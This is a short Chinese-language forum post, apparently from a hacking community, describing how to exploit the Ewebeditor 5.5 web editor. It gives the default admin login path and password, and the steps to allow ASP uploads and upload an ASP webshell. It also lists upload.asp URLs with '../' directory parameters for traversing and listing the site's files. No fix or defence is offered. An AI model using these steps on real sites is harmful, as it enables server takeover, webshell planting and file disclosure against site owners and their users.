  
- 帖子
- 253
- 积分
- 742
- 威望
- 1111
- 金钱
- 841
- 在线时间
- 30 小时

|
发布时间:2010-01-11
影响版本:Ewebeditor 5.5
发布作者:udb311 from 黑白前线
漏洞描述:
利用方法1:
后台登录:ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin
添加上传类型asp,调用用样式上传页ewebeditor/ewebeditor.htm?id=body&style=popup直接上传asp大马。
利用方法2:
进入后台,ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录
ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录
可遍历网站所有目录文件。 |
|